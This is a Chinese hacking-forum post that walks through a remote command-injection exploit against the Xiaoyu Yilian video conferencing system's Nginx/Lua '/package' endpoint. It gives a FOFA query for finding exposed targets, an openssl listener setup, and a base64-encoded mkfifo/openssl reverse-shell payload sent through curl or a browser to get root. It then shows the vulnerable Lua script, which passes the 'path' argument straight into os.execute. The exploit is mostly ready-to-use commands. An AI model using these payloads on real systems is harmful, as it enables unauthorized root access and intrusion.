查看: 24720|回复: 1

小鱼易连视频系统-Nginx LUA脚本远程命令执行

[复制链接]
匿名
匿名  发表于 2021-6-8 19:48:43 |阅读模式
上来就fofa大法:

title="云视讯管理平台"


找到页面了之后寻找该该系统的OpenReaty页面,一般都在其他端口上。


漏洞特征:
通过访问
  1. /package?path=`Liunx命令`
复制代码
可直接构造远程代码执行。

漏洞原理:
“小鱼易连视频会议系统”LUA脚本权限分配不当,导致任意用户可利用root权限执行命令
复现全过程:
本地进行openssl监听:
1、生成证书:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
2、进行监听:

openssl s_server -quiet -key key.pem -cert cert.pem -port 443
3、构造反弹shell命令

  1. mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <IP>:<;PORT> > /tmp/s; rm /tmp/s
复制代码

命令解释:1.mkfifo是创建一个命名管道,创建好了以后/tmp/s内容是空的2.然后不断执行那个bash反弹的命令,连接的地址从步骤1的文件里取3.找那个443连接往步骤1里的文件写入内容,估计是ip和端口4.最后shell弹好了就删除步骤1的文件
4、构造“package?path=”路径下命令执行语句,将上面反弹shell命令进行base64加密。

开始攻击:
1、请求目机机器上执行命令有三种方法:

  1. curl:curl "http://ip/package?path=`echo bWtmaWZvIC90bXAvczsvYmluL2Jhc2ggLWkgPCAvdG1wL3MgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMC42Mi45Ni4yMzY6ODg4ID4gL3RtcC9zO3JtIC1mIC90bXAvcw== | base64 -d | sh`"
复制代码
2、直接web上面请求:

  1. http://ip/package?path=echo bWtmaWZvIC90bXAvczsvYmluL2Jhc2ggLWkgPCAvdG1wL3MgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMC42Mi45Ni4yMzY6ODg4ID4gL3RtcC9zO3JtIC1mIC90bXAvcw== | base64 -d | sh
复制代码

3、burp抓包拦截请求,同web一样。

bp抓上面的请求会返回302,然后跳转404,不要慌,这时候去看你的监听服务器
监听服务器返回shell,直接root权限

接下来详细分析:

找机器来验证,环境为docker,上机查看:

netstat -anvp | grep :80返回结果如下:

  1. tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      16554/nginx: mas
复制代码
运行在 80 端口的程序为 nginx,在宿主机中寻找 nginx 程序


  1. find / -name nginx
复制代码
发现宿主机中没有运行 nginx
于是尝试进入 k8s 中的容器寻找响应服务

  1. docker ps | grep openresty
复制代码
结果如下:

  1. b61e91356e49    "/usr/local/openresty"
复制代码
最终在 k8s 中的 openresty 容器中发现了 nginx 程序/usr/local/openresty/nginx,查询 nginx 配置文件,发现配置文件当中引用了一行 lua 脚本:

  1. location = /package {                proxy_set_header Host $host:$server_port;                proxy_set_header X-Real-IP $remote_addr;                proxy_set_header X-Nginx-IP $server_addr;                limit_req zone=normalfrequ burst=20 nodelay;                content_by_lua_file lua/package.lua;          }
复制代码
查询该文件并查看文件内容 cat /usr/local/openresty/nginx/lua/package.lua

  1. local package_absolute_path = '/var/log/logs.tar.gz'local path = ngx.req.get_uri_args().pathif nil == path then    path = '/logs'end
  2. os.execute('rm -rf ' .. package_absolute_path)os.execute('tar -zcvPf ' .. package_absolute_path .. ' ' .. path)ngx.redirect('/log/logs.tar.gz?' .. os.time())print('rm -rf ' .. package_absolute_path)os.execute('rm -rf ' .. package_absolute_path)return
复制代码
仔细研究发现在配置文件中直接对path参数传入的字符串与rm -rf等命令进行拼接,没有进行文件白名单等过滤,攻击者可以通过构造特殊字符串对命令进行闭合,从而造成Linux命令注入,公网大多已修复后才进行爆出。
谨记网络安全法,切勿用于非法用途


               
回复

使用道具 举报

  • TA的每日心情

    2022-6-28 21:32
  • 签到天数: 30 天

    [LV.5]常住居民I

    发表于 2022-3-14 15:17:43 | 显示全部楼层
    过来瞄几眼
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 01:53 , Processed in 0.026330 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部